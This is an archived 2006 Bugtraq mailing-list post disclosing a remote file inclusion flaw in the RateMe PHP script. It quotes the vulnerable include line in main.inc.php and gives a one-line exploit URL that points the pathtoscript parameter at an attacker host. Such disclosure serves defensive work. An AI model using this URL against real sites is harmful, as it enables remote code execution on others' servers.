RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: RateMe <= all versions => ( main.inc.php ) Remote File Include Vulnerability
From: saudi@xxxxxxxxxx
Date: 18 Dec 2006 09:23:54 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                               
  ;;ii,,::              +
+                                                 ::::            ::            
  ;;tt;;::              +
+                                                 ;;::          ..,,::          
  ;;ii,,::              +
+                           ,,,,                ii;;,,          ii;;::          
  ;;ii,,::              +
+                           ii::                tt;;,,        ..tt;;,,..        
  ;;ii;;::              +
+                         ii,,::                ttii,,        ..ff;;;;::        
  ;;ii;;::              +
+                         tt;;::..,,            tt;;,,          ff;;;;ii        
  ;;ii,,::              +
+                         tt;;::;;::            tt;;,,..        jj;;,,..        
  ;;tt,,::              +
+                         tt;;;;,,              tt;;,,..        tt;;;;          
  ;;ii;;::              +
+                     ..::,,;;,,                tt;;,,..        tt;;,,          
  ;;ii,,::              +
+                 ..::,,ii;;;;..                tt;;,,..        iiii,,::        
  ;;ii,,::              +
+               ::,,ttiijj;;,,                  tt;;;;..        ;;tt,,::        
  ;;ii,,::              +
+             ,,;;ii    tt;;,,                  ii;;,,..        ..jj;;::        
  ;;ii;;::              +
+           ;;;;::      tt;;::                  tt;;;;..          ff;;::        
  ;;tt,,..              +
+         ii;;..      ,,ii;;::                  ii;;,,..          jj;;,,        
  ;;ii,,..              +
+       ,,;;,,      ::;;;;;;::                  ii;;;;..          tt;;,,        
  ;;ii;;..              +
+       tt;;::::  ::,,;;jj,,::                  tt;;,,..          tt;;,,        
  ;;ii,,..              +
+       jj;;;;,,,,,,iiiiii;;::                ..tt;;,,::          iiii,,        
  ;;ii,,..              +
+       ;;ffjjttjjttii  ii;;::                ii;;;;;;::          ..jj,,        
  ;;ii;;..              +
+           ..;;..      ii;;,,::            ,,;;;;jj;;,,          ..jj,,        
  ;;ii,,..              +
+                       iiii;;,,::::....::,,,,;;,,jj;;;;,,::    ::,,;;,,        
  ;;ii;;                +
+                       ..ff;;;;;;,,,,::,,;;;;;;  ttii;;;;,,,,,,,,;;;;::        
  ;;ii,,                +
+                         jjii;;;;;;;;;;;;;;ii..  ..ff;;;;;;;;;;;;;;;;          
  ;;ii,,                +
+                           jjjj;;;;ii;;;;tt..      iijj;;;;;;;;;;ii::          
  ;;ii::                +
+                             iijjjjjjtt;;            ;;ffffjjjjtt::            
  ;;ii                  +
+                                                           ;;..                
  ii;;                  +
+                                                                               
  ..                    +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#########################################################################################################
# Affected Script: RateMe
# Exploit name : RateMe <= all versions =>  ( main.inc.php ) Remote File 
Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/  not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & -  al7ejaz.hackerz[at]gmail.com
#########################################################################################################
#########################################################################################################
#
#  Description :
#  File infected : main.inc.php , line 17
#
#  echo "\n<!-- Start RateMe v$version output -->\n\n<link 
href='".$pathtoscript."style.css' rel='stylesheet' type='text/css'>\n<div 
class='votingtxt'>";
#  include($pathtoscript.'db_connect.inc.php');  # <==
#
#  Exploit : http://victime/path/main.inc.php?pathtoscript=http://Atacke
#
########################################################################################################

Prev by Date: Re: The (in)security of Xorg and DRI
Next by Date: SYMSA-2006-013: Multiple Vulnerabilities in Mandiant First Response
Previous by thread: HyperVM Cross-Site Scripting
Next by thread: SYMSA-2006-013: Multiple Vulnerabilities in Mandiant First Response
Index(es):
- Date
- Thread